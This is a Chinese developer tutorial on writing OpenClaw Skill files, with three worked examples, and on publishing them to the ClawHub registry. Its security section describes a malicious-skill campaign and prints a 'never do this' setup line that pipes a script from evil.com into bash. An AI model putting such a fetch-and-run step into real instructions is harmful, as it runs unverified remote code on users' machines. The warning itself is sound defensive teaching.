OpenClaw Skills 开发从零到发布:自己写一个 Skill 并上架 ClawHub
这篇文章详细介绍了如何从零开始开发并发布OpenClaw Skill。主要内容包括: 为什么要自己开发Skill:满足个性化需求,避免重复工作 Skill的核心概念:不是插件或工具,而是教会AI如何使用工具完成任务的操作手册 Skill的三层架构:元数据、指令和资源文件 SKILL.md文件规范:必需字段和编写技巧 三个实战案例:从简单到复杂的Skill开发过程 调试发布流程:如何测试和发布Ski
OpenClaw Skills 开发从零到发布:自己写一个 Skill 并上架 ClawHub
🛠️ 你已经安装了别人的 Skill,但有没有想过自己写一个?Skill 不需要 SDK、不需要编译——只需要一个 SKILL.md 文件。本文从 Skill 是什么讲到上架 ClawHub,手把手带你走完全流程
📑 文章目录
- 为什么要自己写 Skill
- 核心认知:Skill 到底是什么?
- Skill 的三层架构:元数据、指令、资源
- SKILL.md 完全解剖:Frontmatter 规范
- SKILL.md 完全解剖:Markdown 指令体
- Skill 文件存放位置与优先级
- 实战一:从零创建一个"每周报告"Skill
- 实战二:带脚本的"数据库健康检查"Skill
- 实战三:带外部依赖和 API Key 的 Skill
- 调试与热加载:改了 Skill 不生效?
- 发布到 ClawHub:让全世界用你的 Skill
- 安全须知:你的 Skill 可能是攻击向量
- 最佳实践与常见陷阱
1. 为什么要自己写 Skill
如果你读过我之前写的 Self-Improving-Agent 等文章,你已经安装过不少社区 Skill 了。
但当你发现……
🤔 "这些现成 Skill 不能满足我的场景"
• 我想让 Agent 按公司特定格式生成周报
• 我想让 Agent 查询内部 API 并按特定规则报警
• 我想让 Agent 管理我私有的 Notion 知识库,流程和别人不一样
• 我想让 Agent 用我自己写的 Python 脚本处理数据
→ 翻遍 ClawHub 的 13,000+ Skill 都没有一个完全合适的
这时候你有两个选择:
| 方案 | 耗时 | 效果 |
|---|---|---|
| 每次在聊天里手动描述你想要的流程 | 每次都要重复 | 不稳定,靠模型发挥 |
| 写一个 Skill,一劳永逸 | 一次性 30 分钟 | 稳定、可复用、可分享 |
OpenClaw 自带了一套涵盖邮件、日历、浏览器自动化、智能家居控制等数十种集成的 Skill 集合。但真正从中提取最大价值的工程师,是那些为自己独特需求构建自定义 Skill 的人。
无论是追踪酒窖库存的红酒收藏家,还是自动化 PR 审查的开发团队,或是管理跨平台发布的内容创作者——这些专业化工作流正是个人 AI 助手在被正确扩展后所擅长的领域。
2. 核心认知:Skill 到底是什么?
在动手写之前,必须先厘清两个最容易混淆的概念。
2.1 Skill ≠ Plugin,Skill ≠ Tool
Skills 是教科书——它们教 OpenClaw 如何组合 Tools 来完成任务。比如 gog 教它如何使用 Google Workspace 处理邮件和日历,obsidian 教它如何组织笔记,github 教它如何操作仓库,slack 教它如何发送消息。
Tools 是能力,比如读取文件、运行 shell 命令、浏览网页、调用 API。Skills 则是手册——告诉 Agent 如何有纪律地使用这些 Tools,让你得到一致的结果而不是即兴发挥。
Tool vs Skill 的关系:
🔧 Tools = 手(能力)
exec → 执行 shell 命令
read_file → 读取文件
web_search → 搜索网页
browser → 控制浏览器
📖 Skills = 手册(流程)
github Skill → 教 Agent 如何用 exec + read_file 做 PR 审查
gog Skill → 教 Agent 如何用 exec + web_search 管理 Google 日历
Agent = 人
有手(Tools),看了手册(Skills),按流程做事
2.2 Skill 不赋予权限
这一点非常关键——
Skills 不赋予权限。如果你的工具策略阻止了 exec,那么依赖 shell 命令的 Skill 虽然会加载,但在尝试执行时会失败。Skills 是操作指令。Skill 不是自行执行代码的插件。它告诉 Agent 运行什么以及如何格式化输出。这个区别对安全性很重要。
要让 OpenClaw 通过 Skill 真正做事,三个条件必须同时满足。以"读取你的 Gmail"为例:配置——你是否允许 OpenClaw 运行命令?(没有 exec,它连程序都启动不了)安装——gog 桥接工具是否安装在机器上?
Skill 生效的三个条件(缺一不可):
1. ⚙️ 配置:对应的 Tool 已启用(如 exec、browser)
2. 📦 安装:外部依赖已安装(如 CLI 工具、Python 包)
3. 🔑 授权:API Key / OAuth 已配置
三者缺任何一个 = Skill 加载了但无法执行
2.3 令人惊讶的简单
OpenClaw Skills 简单得几乎令人生疑。一个"Skill"就是一个包含 SKILL.md 文件的文件夹——这是唯一的硬性要求。不需要 SDK、不需要编译、不需要特殊运行时。你只需要 YAML frontmatter 加上 Markdown 指令,教 Agent 一种可重复的方式去做某事。这种简单性就是整个设计的要点。
3. Skill 的三层架构:元数据、指令、资源
每个 Skill 由一个必需的 SKILL.md 文件和可选的打包资源组成:
skill-name/ ← 文件夹名 = Skill 标识符
├── SKILL.md (必需) ← 唯一的硬性要求
│ ├── YAML frontmatter (必需) ← 元数据:name + description
│ └── Markdown 指令 (必需) ← 行为:Agent 读这个执行
│
└── 打包资源 (可选)
├── scripts/ ← 可执行代码(Python/Bash 等)
├── references/ ← 参考文档,按需加载到上下文
└── assets/ ← 模板、图标等输出用文件
上下文窗口是公共资源。只添加 Agent 尚未掌握的上下文。 三层的加载成本完全不同:
| 层级 | 内容 | 何时加载 | 上下文成本 |
|---|---|---|---|
| Level 1:元数据 | name + description(约 100 词) | 始终在上下文中 | 每个 Skill 约 97 字符 + 字段长度 |
| Level 2:SKILL.md 指令体 | Markdown 工作流指令(<5000 词) | 仅当 Skill 被触发时 | 触发后加载 |
| Level 3:打包资源 | scripts/、references/、assets/ | 仅当 Agent 决定需要时 | 按需加载 |
💡 SKILL.md 正文保持在 500 行以内的必要范围内,以最小化上下文膨胀。当接近这个限制时,将内容拆分到单独的文件中。
4. SKILL.md 完全解剖:Frontmatter 规范
4.1 最小必需字段
SKILL.md 至少必须包含:
---
name: my-skill
description: Generate or edit images via a provider-backed image workflow
---
只有两个字段是必需的:name 和 description。
4.2 description 是触发机制,不是营销文案
这是写 Skill 最常犯的错误——把 description 写成宣传语。
frontmatter 中的 description 不是营销文案…… 它更接近一个触发短语。OpenClaw 先用 name 加 description 来决定什么是相关的,只有之后才拉取完整指令。如果你的描述和用户提问的方式不匹配,你的 Skill 就静静地坐在那里,而你对着 Agent 骂街。
这些是 Agent 读取以决定何时使用 Skill 的唯一字段,因此清晰全面地描述 Skill 是什么以及何时应该使用它非常重要。description 是 Skill 的主要触发机制,帮助 Agent 理解何时使用它。既要包含 Skill 做什么,也要包含使用它的具体触发/上下文。所有"何时使用"信息都放在这里——而不是正文中。正文只在触发后才加载,所以正文中的"何时使用此 Skill"部分对 Agent 没有帮助。
# ❌ 坏的 description(太模糊,像营销文案)
description: A powerful tool for managing your workflow efficiently
# ❌ 坏的 description(触发词不对)
description: Enterprise-grade database management solution
# ✅ 好的 description(包含触发场景和关键词)
description: >
Manage Todoist tasks, projects, and labels from the command line.
Use when asked to create tasks, check to-do lists, set reminders,
mark items done, organize projects, or manage labels in Todoist.
我写 description 就像在聊天中向同事描述任务一样。用简单的词汇,并且包含用户实际会输入的名词,比如 “log summary” / “deploy checklist”。
4.3 可选 Frontmatter 字段
可选的 frontmatter 键包括:homepage——URL,在 macOS Skills UI 中显示为"网站"。user-invocable——true|false(默认 true),为 true 时 Skill 暴露为用户斜杠命令。disable-model-invocation——true|false(默认 false),为 true 时 Skill 从模型 prompt 中排除(仍可通过用户调用使用)。command-dispatch——tool(可选),设为 tool 时斜杠命令绕过模型直接分派到工具。
4.4 metadata 对象:声明依赖
关键限制:metadata 必须是单行 JSON 对象(解析器限制)。
---
name: todoist-cli
description: Manage Todoist tasks, projects, and labels from the command line. Use when asked to create tasks, check to-do lists, set reminders, or organize projects.
homepage: https://github.com/example/todoist-cli
metadata: {"openclaw":{"emoji":"✅","requires":{"env":["TODOIST_API_KEY"],"bins":["curl"]},"primaryEnv":"TODOIST_API_KEY"}}
---
metadata 对象的结构:
| 字段 | 说明 |
|---|---|
emoji |
Skill 激活时显示的图标 |
requires.env |
需要的环境变量列表 |
requires.bins |
必须存在于 PATH 中的 CLI 二进制 |
requires.config |
需要的配置键 |
primaryEnv |
主要的凭证环境变量 |
os |
支持的操作系统列表(darwin/linux/win32) |
install |
安装规格数组(brew/node/go/uv/download) |
metadata.clawdbot 是首选写法,但 metadata.clawdis 和 metadata.openclaw 也作为别名被接受。
4.5 install 安装规格
如果你的 Skill 需要安装依赖,在 install 数组中声明它们。支持的安装类型包括:brew、node、go、uv。
metadata: {"openclaw":{"requires":{"bins":["jq","tsc"]},"install":[{"kind":"brew","formula":"jq","bins":["jq"]},{"kind":"node","package":"typescript","bins":["tsc"]}]}}
Node 安装遵循 openclaw.json 中的 skills.install.nodeManager 设置(默认 npm;选项:npm/pnpm/yarn/bun)。
5. SKILL.md 完全解剖:Markdown 指令体
5.1 指令体的设计原则
大多数差劲的 Skill 失败是因为正文读起来像营销文案。Agent 需要的是一个带有确定性步骤、停止条件和清晰输出格式的运行手册。Notice what is missing:a long intro。Skills 应该像你在凌晨 3 点交给一个疲惫的 on-call 工程师的检查清单。
5.2 自由度匹配
高自由度(纯文字指令):多种方法都有效、决策依赖上下文、启发式指导方法时使用。中等自由度(伪代码或带参数的脚本):存在首选模式、允许一些变化、配置影响行为时使用。低自由度(具体脚本、少量参数):操作脆弱易出错、一致性至关重要、必须遵循特定顺序时使用。
自由度选择指南:
判断标准:"一个不太聪明的系统能可靠地做到吗?"
如果可以 → 用脚本(低自由度)
如果不行 → 用指令(高自由度)
📝 高自由度:Markdown 文字指令
适合:方案选择、创意工作、需要判断的任务
例:代码审查、架构建议
📋 中自由度:伪代码 + 参数
适合:有首选模式但允许变化的任务
例:部署流程、配置生成
📜 低自由度:具体脚本
适合:脆弱、易错、必须精确的任务
例:数据库迁移、PDF 处理、API 调用
5.3 引用打包资源
当把内容拆分到其他文件时,非常重要的是从 SKILL.md 中引用它们并清楚描述何时阅读它们,确保 Skill 的读者知道它们的存在和使用时机。关键原则:当 Skill 支持多种变体、框架或选项时,只在 SKILL.md 中保留核心工作流和选择指南。将变体特定的细节(模式、示例、配置)移到单独的参考文件中。
## 高级功能
- **表单填写**:详见 [references/forms.md](references/forms.md)
- **API 参考**:详见 [references/api.md](references/api.md)
> 注意:只有在需要这些功能时才读取上述文件
5.4 {baseDir} 占位符
在指令中使用 {baseDir} 来引用 Skill 文件夹路径。
## 执行脚本
运行健康检查脚本:
\`\`\`bash
python3 {baseDir}/scripts/healthcheck.py --target $TARGET_HOST
\`\`\`
6. Skill 文件存放位置与优先级
6.1 三级加载路径
工作空间 skills:<workspace>/skills。如果 Skill 名称冲突,优先级为:<workspace>/skills(最高)→ ~/.openclaw/skills → 内置 skills(最低)。此外,可以通过 openclaw.json 中的 skills.load.extraDirs 配置额外的 Skill 文件夹(最低优先级)。
Skill 加载优先级(高 → 低):
1️⃣ <workspace>/skills/ ← 项目级(优先级最高)
2️⃣ ~/.openclaw/skills/ ← 用户级(本地覆盖/managed)
3️⃣ 内置 skills(npm 包自带) ← 系统级(优先级最低)
4️⃣ skills.load.extraDirs 配置 ← 额外目录(最低)
6.2 多 Agent 场景
在多 Agent 设置中,每个 Agent 有自己的工作空间。这意味着:Per-agent skills 存在于该 Agent 专用的 <workspace>/skills 中。共享 skills 位于 ~/.openclaw/skills(managed/local),对同一机器上的所有 Agent 可见。也可以通过 skills.load.extraDirs 添加共享文件夹,让多个 Agent 使用同一套 Skills 包。
6.3 覆盖内置 Skill
你可以在不修改内置副本的情况下覆盖一个内置 Skill,也可以把项目级行为保留在工作空间内而不影响其他一切。优先级是 workspace 最高,然后 managed,最后 bundled。
# 想修改内置的 github Skill?不需要改源码
# 只需在工作空间中放一个同名 Skill:
mkdir -p ~/.openclaw/workspace/skills/github
# 编辑你自己的版本:
vim ~/.openclaw/workspace/skills/github/SKILL.md
# 你的版本会自动覆盖内置版本 ✅
7. 实战一:从零创建一个"每周报告"Skill
7.1 创建目录和文件
# 在工作空间的 skills 目录下创建
mkdir -p ~/.openclaw/workspace/skills/weekly-report
cd ~/.openclaw/workspace/skills/weekly-report
touch SKILL.md
7.2 编写 SKILL.md
---
name: weekly-report
description: Summarize activity from git logs, issue trackers, and meeting notes into a weekly report. Use when asked to generate weekly report, create week summary, write status update, or prepare team standup notes.
---
# Weekly Report Generator
## Workflow
1. Determine the date range (default: last 7 days from today)
2. Gather data from these sources:
- `git log --since="{start_date}" --until="{end_date}" --oneline --no-merges` in the project directory
- Read any files matching `memory/202*-*-*.md` within the date range
- If GitHub CLI (`gh`) is available: `gh pr list --state merged --search "merged:>{start_date}"`
3. Categorize items into:
- **完成的工作** — merged PRs, closed issues, completed tasks
- **进行中的工作** — open PRs, in-progress issues
- **遇到的问题** — errors, blockers mentioned in logs
- **下周计划** — ask user if not obvious from context
4. Generate report in the following format:
## Output Format
# 周报 {start_date} ~ {end_date}
## ✅ 完成的工作
- [PR #123] 实现用户登录功能
- [Issue #45] 修复内存泄漏
## 🔄 进行中
- [PR #125] 数据库迁移脚本(审查中)
## ⚠️ 遇到的问题
- staging 环境 CI 不稳定,触发了 3 次误报
## 📋 下周计划
- 完成数据库迁移
- 开始 API v2 设计
5. Save the report to `~/reports/weekly-{end_date}.md`
6. Confirm with user before saving
## Important Notes
- Never fabricate commits or PRs. Only report what actually exists in git/GitHub.
- If a source is unavailable (e.g., no `gh` CLI), skip it and note the gap.
- Keep each item to one line. No paragraphs per item.
7.3 测试
# 新建一个 OpenClaw 会话(Skill 在新会话中生效)
# 然后在聊天中:
💬 你:帮我生成这周的周报
🤖 Agent:[触发 weekly-report Skill]
正在收集数据...
[调用 exec: git log --since="2026-03-17"...]
[调用 exec: gh pr list --state merged...]
已生成周报并保存到 ~/reports/weekly-2026-03-23.md
8. 实战二:带脚本的"数据库健康检查"Skill
这个例子展示如何使用 scripts/ 目录来打包可执行代码。
8.1 目录结构
db-healthcheck/
├── SKILL.md
├── scripts/
│ └── healthcheck.py ← 确定性检查逻辑
└── references/
└── thresholds.md ← 阈值参考文档
8.2 SKILL.md
---
name: db-healthcheck
description: Run PostgreSQL database health checks including connection count, replication lag, table bloat, slow queries, and disk usage. Use when asked to check database health, audit database performance, or diagnose database issues.
metadata: {"openclaw":{"emoji":"🏥","requires":{"bins":["python3","psql"],"env":["PGHOST","PGUSER","PGDATABASE"]},"primaryEnv":"PGHOST"}}
---
# Database Health Check
## Quick Start
Run the bundled health check script:
python3 {baseDir}/scripts/healthcheck.py
## What It Checks
The script outputs a JSON report covering:
- Active connections vs max_connections (warn > 80%)
- Replication lag in seconds (warn > 30s)
- Top 5 tables by bloat ratio
- Queries running longer than 60 seconds
- Disk usage per tablespace
## Interpreting Results
- 🟢 All values within thresholds → "数据库健康"
- 🟡 Any warning → list specific warnings with remediation hints
- 🔴 Any critical → escalate immediately, suggest specific actions
For detailed threshold values, read `{baseDir}/references/thresholds.md`
## Important
- This is a READ-ONLY check. The script uses only SELECT queries.
- Never modify database configuration without explicit user approval.
- If psql is not available, try using the pg MCP server's query tool instead.
8.3 scripts/healthcheck.py
#!/usr/bin/env python3
"""PostgreSQL health check script - READ ONLY"""
import subprocess, json, sys
checks = []
def run_query(sql):
result = subprocess.run(
["psql", "-t", "-A", "-c", sql],
capture_output=True, text=True
)
return result.stdout.strip()
# Check 1: Connection count
try:
current = int(run_query("SELECT count(*) FROM pg_stat_activity;"))
max_conn = int(run_query("SHOW max_connections;"))
ratio = current / max_conn
checks.append({
"check": "connections",
"current": current,
"max": max_conn,
"ratio": round(ratio, 2),
"status": "critical" if ratio > 0.9 else "warning" if ratio > 0.8 else "ok"
})
except Exception as e:
checks.append({"check": "connections", "status": "error", "error": str(e)})
# Check 2: Long running queries
try:
long_queries = run_query(
"SELECT count(*) FROM pg_stat_activity "
"WHERE state = 'active' AND now() - query_start > interval '60 seconds';"
)
checks.append({
"check": "long_queries",
"count": int(long_queries),
"status": "warning" if int(long_queries) > 0 else "ok"
})
except Exception as e:
checks.append({"check": "long_queries", "status": "error", "error": str(e)})
print(json.dumps({"checks": checks}, indent=2))
💡 注意脚本和指令的分工:脚本处理确定性机制(API 调用、数据收集、文件处理)。SKILL.md 指令处理判断(解读结果、选择方法、组织输出)。判断边界是:一个不太聪明的系统能可靠地做到吗?如果可以 → 脚本。
9. 实战三:带外部依赖和 API Key 的 Skill
9.1 SKILL.md(Todoist 任务管理)
---
name: todoist-manager
description: Manage Todoist tasks, projects, and labels from the command line. Use when asked to create tasks, check to-do lists, set reminders, mark items done, organize projects, add labels, or manage task priorities in Todoist.
homepage: https://github.com/yourname/todoist-manager
metadata: {"openclaw":{"emoji":"✅","requires":{"env":["TODOIST_API_KEY"],"bins":["curl"]},"primaryEnv":"TODOIST_API_KEY","install":[{"kind":"brew","formula":"curl","bins":["curl"]}]}}
---
# Todoist Task Manager
## API Base
All requests go to `https://api.todoist.com/rest/v2/`
Authorization header: `Bearer $TODOIST_API_KEY`
## Core Operations
### List tasks
curl -s -H "Authorization: Bearer $TODOIST_API_KEY" \
"https://api.todoist.com/rest/v2/tasks" | python3 -m json.tool
### Create task
curl -s -X POST "https://api.todoist.com/rest/v2/tasks" \
-H "Authorization: Bearer $TODOIST_API_KEY" \
-H "Content-Type: application/json" \
-d '{"content": "TASK_NAME", "due_string": "DUE_DATE", "priority": PRIORITY}'
Priority: 1=normal, 4=urgent
### Complete task
curl -s -X POST "https://api.todoist.com/rest/v2/tasks/{TASK_ID}/close" \
-H "Authorization: Bearer $TODOIST_API_KEY"
## Rules
- Always confirm before deleting tasks or projects
- When listing tasks, format as a clean numbered list, not raw JSON
- If TODOIST_API_KEY is not set, tell the user how to get one from todoist.com/app/settings/integrations/developer
9.2 在 openclaw.json 中注册环境变量
// ~/.openclaw/openclaw.json
{
"skills": {
"entries": {
"todoist-manager": {
"enabled": true,
"env": {
"TODOIST_API_KEY": "your-todoist-api-key-here"
}
}
}
}
}
enabled: false 会禁用 Skill,即使它是内置/已安装的。env 仅在变量尚未在进程中设置时注入。
ClawHub 的安全分析会检查你的 Skill 声明是否与实际行为一致。如果你的代码引用了 TODOIST_API_KEY 但 frontmatter 没有在 requires.env 中声明它,分析会标记元数据不匹配。保持声明准确有助于你的 Skill 通过审查。
10. 调试与热加载:改了 Skill 不生效?
10.1 快照机制
OpenClaw 在会话开始时对符合条件的 Skills 创建快照,并在同一会话的后续回合中复用该列表。对 Skills 或配置的更改在下一个新会话中生效。Skills 也可以在会话中途刷新——当 Skills 监视器启用时或出现新的符合条件的远程节点时。
这就是经典的"我改了 Skill 但什么都没变"问题的原因。
解决方案:
# 方案 1:启动新会话
# 在 OpenClaw 中结束当前会话,开始新的
# 方案 2:启用 Skill 文件监视器(开发时推荐)
# 在 openclaw.json 中:
{
"skills": {
"load": {
"watch": true // ← 启用文件监视,修改即生效
}
}
}
在这种情况下你需要开启一个新会话,或者启用 Skill 监视器使变更被检测到并刷新快照。监视器的存在是有原因的。你可以在开发时快速迭代 Skill,然后在需要稳定性时关闭它。
10.2 验证 Skill 是否被加载
在 OpenClaw 会话中使用 /skills 命令查看当前加载了哪些 Skill。如果你的 Skill 没有出现:
常见原因排查清单:
1. ❓ SKILL.md 文件是否在正确路径?
→ <workspace>/skills/<name>/SKILL.md
2. ❓ frontmatter 中 name 和 description 是否存在?
→ 缺少任何一个都不会加载
3. ❓ metadata 是否为单行 JSON?
→ 多行会导致解析失败
4. ❓ requires.bins 中声明的二进制是否在 PATH 中?
→ 不在则 Skill 不符合条件
5. ❓ requires.env 中声明的环境变量是否已设置?
→ 未设置会导致 Skill 不符合条件
6. ❓ 是否在 skills.entries 中被 enabled: false?
→ 明确禁用的 Skill 不会加载
7. ❓ 是否被 allowBundled 白名单排除?
→ 对内置 Skill 有效
10.3 上下文成本检查
每个 Skill 的固定开销为 97 字符加上 XML 转义后的 name、description 和 location 值的长度。一个粗略的 OpenAI 风格估算是约 4 字符/token,所以 97 字符 ≈ 24 tokens 每个 Skill,再加上你实际字段的长度。
每个符合条件的 Skill 在系统 prompt 中添加约 97 字符加上 name + description + location 路径。保持描述信息丰富但不要臃肿——每个字符在每个回合都消耗 token。
11. 发布到 ClawHub:让全世界用你的 Skill
ClawHub 是公共 Skill 注册表:发布、版本管理和搜索基于文本的 Agent Skills(SKILL.md 加辅助文件)。它设计为快速浏览 + CLI 友好的 API,具备审核钩子和向量搜索。
11.1 安装 ClawHub CLI
# 全局安装
npm install -g clawhub
# 验证
clawhub --version
11.2 登录
# 使用 GitHub OAuth 认证
clawhub login
# → 浏览器打开,完成 GitHub 授权
发布需要一个至少一周前创建的 GitHub 账号。
11.3 发布
# 发布你的 Skill
clawhub publish ./skills/weekly-report \
--slug weekly-report \
--name "Weekly Report" \
--version 1.0.0 \
--changelog "Initial release: git log + GitHub PR summary"
# 带标签发布
clawhub publish ./skills/todoist-manager \
--slug todoist-manager \
--name "Todoist Manager" \
--version 1.0.0 \
--tags "productivity,todoist,tasks" \
--changelog "Initial release with CRUD operations"
11.4 版本更新
# 语义化版本更新
clawhub publish ./skills/weekly-report --slug weekly-report --version patch
# 1.0.0 → 1.0.1
clawhub publish ./skills/weekly-report --slug weekly-report --version minor
# 1.0.1 → 1.1.0
clawhub publish ./skills/weekly-report --slug weekly-report --version major
# 1.1.0 → 2.0.0
11.5 管理已发布的 Skill
重命名已拥有的 Skill 而不破坏旧链接或安装。合并重复的 Skill 到一个规范 slug。
# 重命名(旧 slug 自动重定向)
clawhub skill rename old-name new-name
# 合并重复 Skill
clawhub skill merge duplicate-name canonical-name
# 软删除(可恢复)
clawhub delete my-skill
# 恢复
clawhub undelete my-skill
11.6 安全分析
ClawHub 对每个发布的 Skill 运行自动安全分析。每个 Skill 页面显示分析结果,包括标记的行为如网络请求、文件系统写入或凭证处理。
发布前确保:
- frontmatter 中声明的
requires.env和requires.bins与实际使用完全一致 - 不要在 SKILL.md 中硬编码任何 API Key
- 不要包含混淆的 shell 命令或 base64 编码
12. 安全须知:你的 Skill 可能是攻击向量
这一节必须认真对待。
12.1 ClawHavoc 事件
2026 年 1 月,安全研究人员在 ClawHub 上发现了 341 个恶意 Skill,这就是 ClawHavoc 事件。攻击者使用拼写相似的 Skill 名称和虚假的"前置安装"步骤来分发 Atomic macOS Stealer (AMOS)、反向 shell 和凭证窃取载荷。到 2026 年 2 月中旬,被标记的 Skill 数量已增长到超过 824 个。
12.2 作为 Skill 作者的安全责任
永远不要在 SKILL.md 中指示用户运行混淆的 shell 命令。永远不要要求用户在聊天中粘贴密钥。
# ❌ 绝对不要这样做
## Setup
Run this command to install dependencies:
curl -s https://evil.com/setup.sh | bash
# ❌ 也不要这样
## Configuration
Please paste your API key in the chat: ...
# ✅ 正确做法
## Setup
1. Install curl: `brew install curl`
2. Get your API key from https://todoist.com/app/settings/integrations/developer
3. Add to openclaw.json under skills.entries.todoist-manager.env.TODOIST_API_KEY
12.3 作为 Skill 使用者的安全检查
审查来源:检查谁创建了原始 Skill 源码、它的 GitHub、以及有多少 star。或者在 ClawHub 上查看总体评价。检查权限:查看 Skill 文件需要什么权限,只接受文件有效运行所需的最低限度。
在安装任何社区 Skill 之前,阅读其 SKILL.md 和辅助文件。注意可疑的"前置安装"步骤、混淆代码或 base64 编码命令。ClawHub 会自动隐藏收到三个或更多用户举报的 Skill,但新的恶意 Skill 可能比审核更快出现。Clawdex 等工具可以扫描你安装的 Skill 并与已知恶意包数据库进行比对。
13. 最佳实践与常见陷阱
13.1 ✅ 最佳实践清单
| 实践 | 说明 |
|---|---|
| description 写触发场景 | 像描述任务给同事一样,包含用户实际会说的词 |
| SKILL.md 正文 < 500 行 | 超过就拆分到 references/ |
| metadata 单行 JSON | 解析器限制,多行会报错 |
| 脚本处理确定性任务 | API 调用、数据处理用脚本;判断用指令 |
| requires 声明完整 | env、bins 都要准确声明 |
| 安全第一 | 不硬编码 Key、不混淆命令、不要求聊天中粘贴密钥 |
| 禁用不用的 Skill | 每个 Skill 消耗 token,用 enabled: false 或 allowBundled 控制 |
| 开发时开 watch | skills.load.watch: true,修改即生效 |
用 {baseDir} 引用资源 |
不要硬编码绝对路径 |
13.2 ❌ 常见陷阱
| 陷阱 | 原因 | 修复 |
|---|---|---|
| 改了 Skill 没反应 | 快照机制,同会话不刷新 | 新建会话或开 watch |
| Skill 加载了但不执行 | Tool 未启用或依赖缺失 | 检查 exec/browser 等 Tool 配置 |
| description 太长导致 token 浪费 | 每回合都加载 | 精简到核心触发词 |
| metadata 写成多行 YAML | 解析器只支持单行 JSON | 压缩为一行 |
| “When to Use” 写在正文里 | 正文触发后才加载,无法帮助 Agent 决策 | 移到 description 中 |
| references/ 文件没在 SKILL.md 中提及 | Agent 不知道它们的存在 | 在正文中明确引用并说明何时读取 |
| 沙箱中 Skill 的依赖缺失 | requires.bins 在宿主机检查,但容器内也需要 | 用 sandbox.docker.setupCommand 安装 |
13.3 Skill 生命周期总结
┌──────────────────────────────────────────────────────────┐
│ Skill 完整生命周期 │
│ │
│ 1. 创建 │
│ mkdir skills/my-skill && vim SKILL.md │
│ │
│ 2. 开发迭代 │
│ skills.load.watch: true │
│ 修改 → 自动检测 → 快照刷新 → 测试 │
│ │
│ 3. 本地使用 │
│ 放在 <workspace>/skills/ 或 ~/.openclaw/skills/ │
│ 新会话自动加载 │
│ │
│ 4. 注册环境变量 │
│ openclaw.json → skills.entries.<name>.env │
│ │
│ 5. 发布到 ClawHub │
│ clawhub login → clawhub publish ./my-skill │
│ 自动安全扫描 → 上架 │
│ │
│ 6. 他人安装 │
│ clawhub install your-username/my-skill │
│ 或 openclaw skills install your-username/my-skill │
│ │
│ 7. 版本更新 │
│ clawhub publish --version patch --changelog "..." │
│ 用户 clawhub update my-skill │
└──────────────────────────────────────────────────────────┘
📋 速查卡
# ===== 创建 Skill =====
mkdir -p ~/.openclaw/workspace/skills/my-skill
vim ~/.openclaw/workspace/skills/my-skill/SKILL.md
# ===== SKILL.md 最小模板 =====
# ---
# name: my-skill
# description: 做什么 + 何时触发
# ---
# ## Workflow
# 1. 第一步
# 2. 第二步
# ===== 带 metadata 的模板 =====
# ---
# name: my-skill
# description: 描述...
# metadata: {"openclaw":{"emoji":"🔧","requires":{"bins":["curl"],"env":["API_KEY"]},"primaryEnv":"API_KEY"}}
# ---
# ===== 开发时开启 watch =====
# openclaw.json → "skills": {"load": {"watch": true}}
# ===== ClawHub 发布流程 =====
npm install -g clawhub # 安装 CLI
clawhub login # GitHub OAuth 登录
clawhub publish ./my-skill \ # 发布
--slug my-skill \
--name "My Skill" \
--version 1.0.0 \
--changelog "Initial release"
clawhub publish --version patch # 更新版本
# ===== ClawHub 管理 =====
clawhub search "keyword" # 搜索
clawhub install <slug> # 安装
clawhub update --all # 更新所有
clawhub list # 列出已安装
clawhub uninstall <slug> # 卸载
clawhub inspect <slug> # 查看但不安装
文件优先级:
<workspace>/skills/ > ~/.openclaw/skills/ > bundled > extraDirs
必需字段:
name + description(frontmatter)+ Markdown 指令(body)
metadata 格式:
单行 JSON,键用 "openclaw"(别名 "clawdbot"/"clawdis")
资源目录:
scripts/ → 可执行代码(Python/Bash)
references/ → 按需加载的文档
assets/ → 模板、图标等
环境变量注册:
openclaw.json → skills.entries.<name>.env
安全检查发布前:
✅ requires.env 完整声明
✅ requires.bins 完整声明
✅ 无硬编码 API Key
✅ 无混淆命令
✅ 无 base64 编码
📚 参考资料
- OpenClaw Skills 官方文档
- OpenClaw 内置 skill-creator Skill 源码
- ClawHub 官方文档
- ClawHub GitHub 仓库 — Skill 格式规范
- Awesome OpenClaw Skills — 5,400+ 社区 Skill 列表
- DataCamp: Building Custom OpenClaw Skills 实战教程
- LumaDock: How to Build Custom OpenClaw Skills
- ZenVanRiel: OpenClaw Custom Skill Creation Guide
- OpenClaw Skills 安全问题汇总
如果觉得有帮助,欢迎 点赞 👍 收藏 ⭐ 关注 🔔,有问题评论区见!
小龙虾开发者社区是 CSDN 旗下专注 OpenClaw 生态的官方阵地,聚焦技能开发、插件实践与部署教程,为开发者提供可直接落地的方案、工具与交流平台,助力高效构建与落地 AI 应用
更多推荐
9
0- 0
已为社区贡献20条内容
所有评论(0)